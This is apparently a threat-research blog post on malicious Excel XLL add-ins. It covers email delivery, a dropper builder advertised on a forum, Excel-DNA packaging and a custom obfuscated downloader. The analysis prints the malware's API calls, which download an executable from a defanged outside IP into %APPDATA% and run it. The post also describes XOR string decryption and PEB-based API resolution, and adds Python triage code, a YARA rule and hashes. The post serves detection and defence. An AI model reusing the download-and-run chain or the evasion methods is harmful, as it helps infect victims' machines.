How Attackers Use XLL Malware to Infect Systems

In recent months, we have seen a growth in malware campaigns using malicious Microsoft Excel add-in (XLL) files to infect systems. This technique is tracked in MITRE ATT&CK as T1137.006. The idea behind such add-ins is that they contain high-performance functions that can be called from an Excel worksheet via an application programming interface (API). This feature lets users extend the functionality of Excel more powerfully than other scripting interfaces such as Visual Basic for Applications (VBA), because it supports more capabilities, such as multithreading. However, attackers can also make use of these capabilities to achieve financial objectives.

In the campaigns we saw, emails with malicious XLL attachments or links were sent to users. Double-clicking the attachment opens Microsoft Excel, which prompts the user to install and activate the add-in.

Figure 1 – Prompt shown to user when opening an XLL file.

Attackers usually place their code in the xlAutoOpen function, which is executed immediately when the add-in is activated. What makes this technique dangerous is that only one click is required to run the malware, unlike VBA macros, which require the user to disable Microsoft Office’s Protected View and enable macro content. However, XLL files are portable executables that follow the format of dynamic link libraries (DLLs), which many email gateways already block. We recommend organizations consider the following mitigations:

  • Configure your email gateway to block inbound emails containing XLL attachments.
  • Configure Microsoft Excel to only permit add-ins signed by trusted publishers.
  • Configure Microsoft Excel to disable proprietary add-ins entirely.

XLL Malware for Sale

The rise in XLL attacks led us to search underground forums to gauge the popularity of tooling and services using this file format. We encountered adverts from one threat actor repeatedly, who claimed to be selling a builder that creates XLL droppers.

Figure 2 – Forum post advertising an XLL Excel dropper.

The user specifies an executable file or a link to one and adds a decoy document. An XLL file is generated as output, which can then be used in attacks.

Figure 3 – XLL Excel dropper user interface.

Excel-DNA Generated Add-Ins

Most XLL samples we analyzed have the same structure. Essentially, XLL files are DLLs containing an exported function called xlAutoOpen. The most common type of malicious XLL file we see is generated using a legitimate software project called Excel-DNA. Looking inside an XLL malware sample that follows this structure, you can see that it contains several large resources (Figure 4).

Figure 4 – Resources inside an XLL generated by Excel-DNA.

This includes Excel-DNA project components as well as the add-in, which in this case is a malware dropper. You can identify the file that contains the Excel add-in code by looking at the resource names or the XML definition file that is also stored in the resource section.

Figure 5 – Excel-DNA XML definition.

In this sample, the add-in containing the malicious code is developed in .NET and is located in the MODDNA resource. To inspect the code, you first need to save this resource to disk and decompress it using the Lempel–Ziv–Markov chain algorithm (LZMA). Since the add-in is a .NET application, we can decompile it to retrieve its source code for further analysis. Figure 6 shows the start function of an XLL add-in we analyzed, which acts as a malware downloader.

Figure 6 – .NET malware downloader extracted from an XLL file.

XLL files created using the Excel-DNA project can also be unpacked automatically using a script provided by the project. The script takes the path of the XLL file as an argument and then extracts, unpacks and saves the resources to a folder.

Figure 7 – Excel-DNA extraction script.

Custom Generated Add-Ins

We have also seen other types of XLL malware lately that don’t use Excel-DNA to generate add-ins. One of these samples, a downloader, was particularly interesting because it was tiny (4.5 KB). Like the other XLL files, the file exports the xlAutoOpen function. To disguise the control flow of the application, many consecutive jmp instructions are executed.

Figure 8 – jmp obfuscation in a custom malicious Excel add-in.
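As an added illustration of the structure described above (a DLL exporting xlAutoOpen, with Excel-DNA payloads in a MODDNA resource) and of the tiny custom add-in discussed here, the following pure-Python triage parses a file's PE export table and flags the traits this post describes. It is not code from the post or from the Excel-DNA project; build_sample_xll constructs a minimal PE32+ fixture for demonstration, not a real sample.

```python
import struct

def exported_names(pe):
    """Return the names in a PE image's export table (empty list if it has none)."""
    nt = struct.unpack_from("<I", pe, 0x3C)[0]                    # e_lfanew
    if pe[:2] != b"MZ" or pe[nt:nt + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, opt_size = (struct.unpack_from("<H", pe, nt + o)[0] for o in (6, 20))
    opt = nt + 24                                                 # optional header
    is64 = struct.unpack_from("<H", pe, opt)[0] == 0x20B
    exp_rva = struct.unpack_from("<I", pe, opt + (112 if is64 else 96))[0]  # export directory entry
    if not exp_rva:
        return []
    secs = [struct.unpack_from("<III", pe, opt + opt_size + 40 * i + 12) for i in range(nsec)]
    def off(rva):                                                 # RVA -> file offset via section table
        for va, raw_size, raw_ptr in secs:
            if va <= rva < va + raw_size:
                return rva - va + raw_ptr
        raise ValueError("unmapped RVA %#x" % rva)
    exp = off(exp_rva)
    n_names = struct.unpack_from("<I", pe, exp + 24)[0]           # NumberOfNames
    table = off(struct.unpack_from("<I", pe, exp + 32)[0])        # AddressOfNames
    def cstr(rva):
        start = off(rva)
        return pe[start:pe.index(b"\0", start)].decode("ascii", "replace")
    return [cstr(r) for r in struct.unpack_from("<%dI" % n_names, pe, table)]

def triage_xll(pe):
    """Flag the traits the post describes: xlAutoOpen export, Excel-DNA MODDNA resource, tiny size."""
    return {"xlAutoOpen": "xlAutoOpen" in exported_names(pe), "excel_dna": b"MODDNA" in pe, "tiny": len(pe) < 10 * 1024}

def build_sample_xll(export_names):
    """Construct a minimal PE32+ fixture exporting the given names (test data, not a real add-in)."""
    sec_va, sec_raw = 0x1000, 0x200
    body = bytearray(40 + 4 * len(export_names))                  # export directory + AddressOfNames
    name_rvas = []
    for nm in export_names:
        name_rvas.append(sec_va + len(body))
        body += nm.encode() + b"\0"
    struct.pack_into("<III", body, 24, len(export_names), 0, sec_va + 40)  # NumberOfNames, AddressOfFunctions, AddressOfNames
    struct.pack_into("<%dI" % len(export_names), body, 40, *name_rvas)
    hdr = bytearray(sec_raw)
    hdr[:2], hdr[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                                   # e_lfanew
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x8664, 1, 0, 0, 0, 240, 0x2022)  # COFF header: x64, 1 section, DLL
    struct.pack_into("<H", hdr, 0x58, 0x20B)                                  # PE32+ magic
    struct.pack_into("<II", hdr, 0x58 + 112, sec_va, len(body))               # export data directory
    struct.pack_into("<IIII", hdr, 0x58 + 240 + 8, len(body), sec_va, len(body), sec_raw)  # section header
    return bytes(hdr) + bytes(body)
```

On a real file, read it in binary mode and pass the bytes to triage_xll; the size threshold mirrors the filesize condition in the YARA rule later in this post.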

To understand how it works, we removed the jmp instructions and analyzed only the relevant instructions. We noticed that encrypted data is located in the file immediately after the executable code. The data is decrypted in a loop that first determines the position and size of the data and then deobfuscates it using an XOR operation. After every 8 bytes, the key is multiplied and added to two different constants.

Figure 9 – Decryption loop of custom Excel add-in.

Once the data is decrypted, it contains three DLL names, five API function names, the URL of the payload and the path to the local file where the payload is to be stored. With the decrypted DLL names, the malware first resolves the module base addresses by traversing the InLoadOrderModuleList via the Process Environment Block (PEB) and then uses them to find the addresses of the API functions it wishes to call.

Figure 10 – DLL module address resolution function.
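The decryption loop described above, reimplemented as an analyst's helper (added example, not code from the post): the blob is XORed 8 bytes at a time and the 64-bit key is advanced with a multiply-and-add step after each block. The post does not print the sample's constants, so MUL, ADD, the key and the configuration strings below are hypothetical values constructed for the demonstration; split_config recovers the NUL-separated DLL names, API names, URL and drop path the post says the decrypted data contains.

```python
import struct

# Placeholder key-schedule constants: the post says the key is multiplied and
# added to constants after every 8 bytes but does not give their values.
MUL, ADD = 0x5851F42D4C957F2D, 0x14057B7EF767814F   # hypothetical
MASK64 = (1 << 64) - 1

def next_key(key, mul=MUL, add=ADD):
    """Advance the rolling XOR key as the loop does after each 8-byte block (64-bit wrap)."""
    return (key * mul + add) & MASK64

def xor_qwords(data, key, mul=MUL, add=ADD):
    """XOR data 8 bytes at a time with a key that is updated after every block.
    XOR is an involution, so the same routine both encrypts and decrypts."""
    out = bytearray()
    for i in range(0, len(data), 8):
        block = data[i:i + 8].ljust(8, b"\0")            # pad a trailing short block
        word = struct.unpack("<Q", block)[0] ^ key
        out += struct.pack("<Q", word)[:len(data) - i]   # drop padding again
        key = next_key(key, mul, add)
    return bytes(out)

def split_config(plain):
    """The decrypted blob the post describes is a run of NUL-terminated strings:
    DLL names, API names, payload URL and local drop path."""
    return [s.decode("ascii", "replace") for s in plain.split(b"\0") if s]

# Constructed sample (not data from the analyzed file): build a config, encrypt
# it with the hypothetical schedule, then recover it the way the malware does.
SAMPLE_CONFIG = b"kernel32.dll\0urlmon.dll\0ExpandEnvironmentStringsW\0hxxp://example.invalid/payload.exe\0%APPDATA%\\dropped.exe\0"
SAMPLE_KEY = 0x0123456789ABCDEF
SAMPLE_BLOB = xor_qwords(SAMPLE_CONFIG, SAMPLE_KEY)

if __name__ == "__main__":
    for item in split_config(xor_qwords(SAMPLE_BLOB, SAMPLE_KEY)):
        print(item)
```

Against a real sample, the initial key and the two constants are read from the loop shown in Figure 9, and the blob is the data following the code section.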

The malware then uses the resolved API functions to download a payload from a web server, store it locally and then execute it. In this example, the malware we analyzed made the following API calls:

  1. GetProcAddress("ExpandEnvironmentStringsW")
  2. ExpandEnvironmentStringsW("%APPDATA%\joludn.exe")
  3. LoadLibraryW("UrlMon")
  4. GetProcAddress("URLDownloadToFile")
  5. URLDownloadToFile("hxxp://141.95.107[.]91/cgi/dl/8521000125423.exe", "C:\Users\REDACTED\AppData\Roaming\joludn.exe")
  6. _wsystem("C:\Users\REDACTED\AppData\Roaming\joludn.exe")

The custom XLL malware can be tracked using the following YARA rule:

rule xll_custom_builder
{
  meta:
    description = "XLL Custom Builder"
    author = "patrick.schlapfer@hp.com"
    date = "2022-01-07"

  strings:
    $str1 = "xlAutoOpen"
    $str2 = "test"
    $op1 = { 4D 6B C9 00 }
    $op2 = { 4D 31 0E }
    $op3 = { 49 83 C6 08 }
    $op4 = { 49 39 C6 }

  condition:
    uint16(0) == 0x5A4D and all of ($str*) and all of ($op*) and filesize < 10KB
}

Conclusion

Microsoft Excel offers many legitimate ways to execute code, such as Excel4 macros, Dynamic Data Exchange (DDE) and VBA, which are widely abused by attackers. Over the last few months, we have seen malware families such as Dridex, Agent Tesla, Raccoon Stealer and Formbook delivered using XLL files during the initial infection of systems. To create these files, the attackers most likely use a builder like the one advertised in the forum post shown in Figure 2. We found that many malicious add-ins are generated using Excel-DNA; however, some XLL malware we analyzed was custom-built and made more use of encryption to disguise its functionality. The increasing volume of XLL attacks in the last few months indicates that attackers are interested in exploring this technique, and that we may see more attackers favor XLL over other execution methods in the coming months.

Indicators of Compromise

XLL add-in built using Excel-DNA

380f15a57aee6d2e6f48ed36dd077be29aa3a3eb05bfb15a1a82b26cfedf6160

Custom XLL add-in

c314c7feeb98de6391da83678e1639aade3fbe9c95846b8c2f2590ea3d34dd4f

More XLL hashes can be found in our GitHub repository.
